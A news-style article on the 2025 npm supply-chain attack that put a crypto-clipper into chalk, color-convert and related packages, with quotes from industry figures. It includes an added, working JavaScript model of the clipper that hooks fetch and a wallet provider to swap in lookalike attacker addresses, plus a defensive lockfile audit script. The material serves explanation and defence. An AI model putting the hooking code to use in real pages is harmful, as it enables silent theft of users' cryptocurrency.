Crypto-Stealing Malware Breaches Core JavaScript Libraries - Millions of Developers at Risk
Malicious code infiltrates foundational web development tools—threatening crypto wallets and exchange integrations worldwide.
Supply Chain Sabotage
The attack targets widely used npm packages, injecting a cryptocurrency-stealing payload into every application that bundles a compromised version. Security researchers who analysed the payload describe it as a clipper rather than a credential stealer: instead of hunting for wallet private keys or exchange API credentials, it swaps the destination address at the moment funds are about to move, so it never needs the victim's keys at all.
Web Infrastructure Under Siege
This isn't just another security flaw: it's a direct assault on the financial plumbing of web3. The payload executes at runtime, inside whatever loads the compromised module, rather than through an install script, so checks that only look at package names and install-time behaviour see nothing unusual; heavy obfuscation lets it blend in with the legitimate library code it ships inside.
Wake-Up Call for Crypto Security
While traditional finance still debates blockchain adoption, crypto-native infrastructure faces sophisticated threats that move faster than compliance committees. The irony? Wall Street's 'too risky' digital assets are now being stolen through the very legacy web systems they refuse to abandon.
Crypto Clipper Malware
The malicious code was a “crypto-clipper” designed to steal cryptocurrency by swapping wallet addresses in network requests and hijacking crypto transactions directly. It was also heavily obfuscated to avoid detection.
The crypto-stealing malware has two attack vectors. When no crypto wallet extension is found, it hooks the browser's native fetch and XMLHttpRequest functions and scans every response for cryptocurrency addresses, replacing each one it finds with an address drawn from extensive lists of attacker-owned wallets.
The swap is not random: an algorithm picks the attacker address that looks most similar to the legitimate one, so the substitution is nearly impossible to spot with the naked eye, according to cybersecurity researchers.
If a crypto wallet is found, the malware instead intercepts transactions before they are signed: when the user initiates one, it modifies the transaction in memory so that the funds are redirected to an attacker address, while the page the user is looking at still shows the intended recipient.
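The two vectors just described, modelled in an added example that is not code from the article or from the compromised packages. Every address in it is a constructed dummy, and the Levenshtein edit distance used to score "visually similar" is an assumption about how the real payload chose its replacements (the page does not say). The block also shows the check a page can run at load time to notice that `fetch` has been replaced by script:

```javascript
// Added example: models the two clipper vectors described above plus a
// defender-side check. Not code from the article or the compromised packages.
// All addresses below are constructed dummies.

const ATTACKER_ADDRESSES = [
  '0x0000000000000000000000000000000000000000',
  '0x12ab34cd000000000000000000000000abcdef12',
  '0x12ab34cd56ef7890abcdef1234567890abcdef99',
];
const ETH_ADDRESS_RE = /0x[0-9a-fA-F]{40}/g;

// Edit distance between two strings (assumption: this is what "visually
// similar" means here; the real payload's scoring is not described on the page).
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, i) => i);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Pick the attacker address closest to the legitimate one.
function pickLookalike(victim, candidates) {
  let best = candidates[0];
  let bestScore = Infinity;
  for (const c of candidates) {
    const d = levenshtein(victim.toLowerCase(), c.toLowerCase());
    if (d < bestScore) { best = c; bestScore = d; }
  }
  return best;
}

function swapAddresses(text, candidates) {
  return text.replace(ETH_ADDRESS_RE, (m) => pickLookalike(m, candidates));
}

// Vector 1 (no wallet extension): replace fetch so every response body the
// page reads has its addresses rewritten. `env` stands in for `window`.
function installFetchHook(env, candidates) {
  const originalFetch = env.fetch;
  env.fetch = async function hookedFetch(...args) {
    const res = await originalFetch.apply(this, args);
    const swapped = swapAddresses(await res.text(), candidates);
    return {
      ok: res.ok,
      status: res.status,
      text: async () => swapped,
      json: async () => JSON.parse(swapped),
    };
  };
  return originalFetch;
}

// Vector 2 (wallet present): wrap the injected provider's request() so the
// `to` field of an eth_sendTransaction is changed before the wallet shows
// its signing prompt. The dApp's own UI still displays the original address.
function installProviderHook(provider, candidates) {
  const originalRequest = provider.request.bind(provider);
  provider.request = async function hookedRequest(req) {
    if (req && req.method === 'eth_sendTransaction' && Array.isArray(req.params) && req.params[0]) {
      const tx = { ...req.params[0] };
      if (typeof tx.to === 'string') tx.to = pickLookalike(tx.to, candidates);
      return originalRequest({ ...req, params: [tx, ...req.params.slice(1)] });
    }
    return originalRequest(req);
  };
  return originalRequest;
}

// Defender check: a browser built-in reports "[native code]" from toString,
// a script-defined replacement reports its own source. Heuristic only: a
// payload can also patch Function.prototype.toString.
function isNativeFunction(fn) {
  return typeof fn === 'function' && /\[native code\]/.test(Function.prototype.toString.call(fn));
}

// Drive both hooks against constructed stand-ins for the page and the wallet.
async function demo() {
  const victimTo = '0x12ab34cd56ef7890abcdef1234567890abcdef12';
  const env = {
    fetch: async () => ({ ok: true, status: 200, text: async () => JSON.stringify({ to: victimTo }) }),
  };
  const seenByWallet = [];
  const provider = { request: async (req) => { seenByWallet.push(req); return '0xdeadbeef'; } };

  installFetchHook(env, ATTACKER_ADDRESSES);
  installProviderHook(provider, ATTACKER_ADDRESSES);

  const quote = await (await env.fetch('/api/quote')).json();
  await provider.request({ method: 'eth_sendTransaction', params: [{ to: victimTo, value: '0x1' }] });
  return { apiTo: quote.to, walletTo: seenByWallet[0].params[0].to, fetchLooksNative: isNativeFunction(env.fetch) };
}
```

Running `demo()` shows both outcomes at once: the quote the page reads back now carries the lookalike address (differing only in its last two characters), and the transaction that reaches the wallet has the same lookalike in `to` even though the dApp built it with the real recipient. The `isNativeFunction` check is cheap to run on `window.fetch` and `XMLHttpRequest.prototype.open` at page load, but treat it as a tripwire, not a guarantee; the only reliable defence is the one Ledger's CEO gives below, reading the address on a hardware wallet's own screen before signing.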
The attack targeted packages such as 'chalk', 'strip-ansi', 'color-convert', and 'color-name', core building blocks buried deep in the dependency trees of countless projects; most applications pull them in transitively rather than listing them as direct dependencies, so a project can be affected without naming any of them in its own package.json.
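Because the packages arrive transitively, `npm ls` output or a glance at package.json is not enough; every copy in the lockfile has to be checked. The following added example (not the article's or any project's own tooling) walks a package-lock.json and lists every installed version of the watched packages, nested copies included, so the result can be compared against the advisory's list of compromised versions. The lockfile and the `COMPROMISED_EXAMPLE` table are constructed stand-ins, and `9.9.9-example` is a placeholder version, not a real release:

```javascript
// Added example, not from the article. Lists every installed version of the
// named packages in a package-lock.json (v1 nested "dependencies" or v2/v3
// flat "packages"), nested copies included, for comparison with an advisory.

const WATCHED = ['chalk', 'strip-ansi', 'color-convert', 'color-name'];

// "node_modules/a/node_modules/@scope/b" -> "@scope/b"; "" (the root) -> null
function packageNameFromPath(p) {
  const idx = p.lastIndexOf('node_modules/');
  return idx === -1 ? null : p.slice(idx + 'node_modules/'.length);
}

function findInstalledVersions(lock, names = WATCHED) {
  const wanted = new Set(names);
  const found = [];
  if (lock.packages) {
    // lockfileVersion 2/3: one flat entry per installed path
    for (const [path, meta] of Object.entries(lock.packages)) {
      const name = packageNameFromPath(path);
      if (name && wanted.has(name)) found.push({ name, version: meta.version, path });
    }
  } else if (lock.dependencies) {
    // lockfileVersion 1: nested tree, so recurse to reach shadowed copies
    const walk = (deps, prefix) => {
      for (const [name, meta] of Object.entries(deps)) {
        const path = `${prefix}node_modules/${name}`;
        if (wanted.has(name)) found.push({ name, version: meta.version, path });
        if (meta.dependencies) walk(meta.dependencies, `${path}/`);
      }
    };
    walk(lock.dependencies, '');
  }
  return found.sort((a, b) => (a.path < b.path ? -1 : a.path > b.path ? 1 : 0));
}

// compromised: { [packageName]: Set of bad versions }, filled from the advisory.
function affectedEntries(found, compromised) {
  return found.filter((f) => compromised[f.name] !== undefined && compromised[f.name].has(f.version));
}

// Constructed sample: a v3 lockfile with a top-level chalk and a second copy
// nested under a CLI tool. "9.9.9-example" is a placeholder, not a real
// release; replace COMPROMISED_EXAMPLE with the advisory's version list.
const SAMPLE_LOCK_V3 = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', version: '1.0.0' },
    'node_modules/chalk': { version: '5.3.0' },
    'node_modules/color-convert': { version: '2.0.1' },
    'node_modules/color-name': { version: '1.1.4' },
    'node_modules/some-cli': { version: '2.0.0' },
    'node_modules/some-cli/node_modules/chalk': { version: '9.9.9-example' },
    'node_modules/some-cli/node_modules/ansi-styles': { version: '4.3.0' },
  },
};
const COMPROMISED_EXAMPLE = { chalk: new Set(['9.9.9-example']) };

// Audit the constructed sample; returns every watched copy and the bad ones.
function auditSample() {
  const found = findInstalledVersions(SAMPLE_LOCK_V3);
  return { found, affected: affectedEntries(found, COMPROMISED_EXAMPLE) };
}
```

To run it against a real project, parse the file with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` and pass the object to `findInstalledVersions`; the nested `some-cli/node_modules/chalk` entry in the sample is exactly the kind of copy that a top-level `npm ls chalk` listing tends to hide. Check the lockfile that produced the deployed bundle, not only the one on a developer's laptop, and re-run after every `npm install` until the compromised versions are gone from the registry.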
The attack was discovered by accident when a build pipeline failed with a "fetch is not defined" error: the malware's code called the browser's fetch function in a Node.js build environment that did not provide it, and the crash drew attention to a file nobody had expected to change.
“If you use a hardware wallet, pay attention to every transaction before signing, and you’re safe. If you don’t use a hardware wallet, refrain from making any on-chain transactions for now,” advised Ledger CEO Charles Guillemet.
Explanation of the current npm hack
In any website that uses this hacked dependency, it gives a chance to the hacker to inject malicious code, so for example when you click a “swap” button on a website, the code might replace the tx sent to your wallet with a tx sending money to…
— 0xngmi (@0xngmi) September 8, 2025
Broad Attack Vector
While the malware's payload specifically targets cryptocurrency, the attack vector is much broader. Any environment that runs JavaScript or Node.js can pick up the compromised packages: web applications running in browsers, desktop applications, server-side Node.js services, and mobile apps built on JavaScript frameworks.
A regular business web application could therefore ship these malicious packages without knowing it; the payload would only do visible harm when a user interacts with cryptocurrency on that site.
Uniswap and Blockstream were among the first to reassure users that their systems were not at risk.
Regarding the reports of the NPM supply chain attack:
Uniswap apps are not at risk
Our team has confirmed that we do not use any vulnerable versions of the affected packages
As always, be vigilant
— Uniswap Labs (@Uniswap) September 8, 2025